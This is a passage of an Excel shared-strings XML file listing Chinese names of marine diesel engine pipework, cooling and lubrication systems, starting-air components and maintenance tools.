    <t xml:space="preserve">管件清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机架管件清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管出口-凸轮轴                                        </t>
  </si>
  <si>
    <t xml:space="preserve">主管-气缸注油器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸滑油                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器润滑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄露油泄放                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵侧顶层格栅管系                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油补充系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-执行器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-燃油凸轮                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-排气凸轮                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-凸轮保护                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-凸轮轴                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泄放管-滚轮导筒                                       </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油泄放管-注油器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-缸套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀油进口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润油管支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">填料函支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油内部管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱放气管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油内部管安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-径向轴承                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体主管装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放主管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">注油器泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管-上防护装置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱放泄管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气管泄放                                           </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄放分支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖泄放管漏斗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器润滑油进口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">排气顶层走台管系                                          </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器润滑油进口主管                                      </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油三通接头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器三通管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主管-涡轮增压器润滑油出口                                     </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-清洗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油三通管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器滑油出口透气管                                      </t>
  </si>
  <si>
    <t xml:space="preserve">节流接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带手柄的三通考克                                          </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂润滑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">中央润滑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-空气分配器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">各种润滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主液压管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管补偿器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">油管补偿器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">减压阀支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">蓄压块支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元液压油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">蓄压块总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器压力管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸常压系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">软管联结泵单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">连接泵单元的软管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">直接头块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">90度接头块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管布置图                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封油进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油进油总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器滑油进口管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器滑油出口管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滤器滑油进口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滤器滑油出口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵滑油进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵滑油出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构+调速器驱动滑油                                      </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油过滤器支架                                          </t>
  </si>
  <si>
    <t xml:space="preserve">手动泵布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">预润滑泵布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">应急吸入管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆润滑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油过滤器安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机座+机架管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵润滑油管出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵滑油进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封油润滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒滑油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前端泵润滑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分配管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵滑油                                               </t>
  </si>
  <si>
    <t xml:space="preserve">调压阀备件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带插座管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管装配                                            </t>
  </si>
  <si>
    <t xml:space="preserve">1/2寸.约束                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油出口泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中冷器滑油进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封油表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">I 号滑油系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">II 号滑油系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">压力润滑油布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">手动泵支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油进口泵                                            </t>
  </si>
  <si>
    <t xml:space="preserve">过滤器润滑油出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油蒸气排出管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分离器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油分离器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力润滑手动泵布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">发电机滑油管出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">离心过滤器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">发电机轴承滑油出口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油收集管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管，总成                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管，阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放阀管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主起动阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气进口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">主启动阀布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气分支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气补偿器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">爆破帽，总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">罩                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">控制和安全空气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管-分配器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀控制管系                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管-燃油泵                                         </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气内嵌块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔支座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管旁通                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放阀控制空气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀控制空气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气管-分配器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器水清洗                                          </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器干洗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">干洗管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器排放空气管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">压力平衡管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主通风管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">通风分支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封控制油管布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制油主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">爆破帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">到涡轮增压器的压缩空气                                       </t>
  </si>
  <si>
    <t xml:space="preserve">喷射系统布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">保护装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">智能控制系统布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">遥控启动布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">慢转布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧主管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">淡水出水管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖淡水管出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">淡水管进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进水管系                                            </t>
  </si>
  <si>
    <t xml:space="preserve">输出端管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压器冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上层排气侧主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧主管组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却水主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气侧泄放管组件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">淡水出口主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水管出口管组件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进水管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">O形圈密封管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑.清洁说明                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水固定支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水活动支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连接管-气缸盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水总管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">淡水出口管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水三通管接头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">温度计块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泄放部件清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水泄放漏斗                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泄放漏斗-增压器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器泄放漏斗支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洁管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洗管导套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽清洁管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器冷却水管系                                          </t>
  </si>
  <si>
    <t xml:space="preserve">机架管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器排水                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">储水盘.滴水分离器前端                                       </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器泄放漏斗                                           </t>
  </si>
  <si>
    <t xml:space="preserve">薄片组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">总管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器试车台                                          </t>
  </si>
  <si>
    <t xml:space="preserve">海水冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水冷却系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中央冷却水系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">天然水冷却系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">2级水冷却系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">塔冷却水系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">除气水箱报警器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">除气水箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">水套冷却水系统                                           </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽加热系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥形管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水分流管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水合流管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器冷却水管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">泵低温进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高温集水管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器低温进口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水管安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵低温出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主机低温出口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发电机低温进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">发电机低温出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器低温出口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器低温进出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器高温进出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">集管淡水出口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气冷却器低温进口                                       </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器高温出口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压空气冷却器低温出口                                       </t>
  </si>
  <si>
    <t xml:space="preserve">预热器高温管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵出口.冷却器入口                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器高温进口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油冷却器高温出口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">泵高温出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器淡水入口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">三通阀高温出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机高温入口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温控阀高温进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">三通阀安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">集管高温出口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">三通阀高温进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵高温进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">集管支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器润滑油系统                                        </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴润滑油系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">烟管安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">烟总管-内部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">烟总管-总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">烟总管-外部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">销连接下端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">进气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">软管元件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">流量检查阀装配                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气总管一侧                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气总管内部拆卸                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管布置                                               </t>
  </si>
  <si>
    <t xml:space="preserve">机舱工具板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">标准工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外形尺寸-主要工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">起吊工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底部格栅                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺母拉紧气动工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">钩形扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定位环钳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扭力扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">吊索扳钳和箱子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">开口扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">双头开口扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒板手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">组合扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">套筒冲击扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">工具盒总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">端支撑螺栓液压拉伸器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">液压顶部支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">关闭接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">牵引螺杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量规总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">连杆总成提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链轮箱提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机部件提升工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">底板提升                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机总成提升                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上平面提升总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">底平面提升总成                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机提升方案2                                          </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机提升方案3                                          </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机提升方案4                                          </t>
  </si>
  <si>
    <t xml:space="preserve">提升截面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">提升剩余部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机包装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">补偿器导向力                                            </t>
  </si>
  <si>
    <t xml:space="preserve">VOC阀压力测试工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">VOC块压力测试工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">VOC出口压力测试工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">VOC流量控制压力测试工具                                     </t>
  </si>
  <si>
    <t xml:space="preserve">VOC进口.压力测试工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">VOC块清洗工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">放出阀测试工具，                                          </t>
  </si>
  <si>
    <t xml:space="preserve">放出阀适配器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀适配器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制油/密封油泄放测试                                       </t>
  </si>
  <si>
    <t xml:space="preserve">VOC块用千斤顶                                          </t>
  </si>
  <si>
    <t xml:space="preserve">VOC块支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀测试工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">变速箱取出器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴+凸轮轴工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元检查工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">流量检查开关工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">备件和工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">包装件                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封圈安装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">拉升                                                </t>
  </si>
  <si>
    <t xml:space="preserve">工具图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承上部工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">工具锁总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">工具箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺顶衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增加工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">V23H工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">26MTB-40工具                                        </t>
  </si>
  <si>
    <t xml:space="preserve">26MTB-40V工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">S28H工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">U28H工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">U45H工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">S50工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">U50工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">S35P工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">零部件操作维护说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖.工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞填料函工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸套+注油器工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">十字头+连杆工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴+推力轴承工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">机械控制机构工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气系统工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">涡轮增压器系统工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">安全要求工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">大部件装配工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">通用工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">额外工具（选配）                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MS-924环氧锲工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">MS-925工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MS-926工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵扳手                                             </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车扳手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">额外工具清单                                            </t>
  </si>
  <si>
    <t xml:space="preserve">研磨台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">研磨台导轨                                             </t>
  </si>
  <si>
    <t xml:space="preserve">研磨台总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">研磨台安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">支架安装工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">MS903工具板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MS907工具板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MS911工具板                                          </t>
  </si>
  <si>
    <t xml:space="preserve">901工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">902工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">903工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">904工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">905工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">906工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">907工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">908工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">909工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">910工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">912工具和工具板                                         </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油底柜出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">底柜检修孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油单元布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">漏斗状容器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴单元布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放储油柜单元布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油泵布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油泵单元                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵单元密封油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力表布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">控制油泵单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">法兰装配部件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">结构支撑布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵进口管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泵出口管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">过滤器进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">预热器进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">预热器出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器进口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">热粘度计进口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">热粘度计出口管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">仪表板布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管装配                                               </t>
  </si>
  <si>
    <t xml:space="preserve">感光单元布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压过滤器单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑装配                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶撑连接                                              </t>
  </si>
  <si>
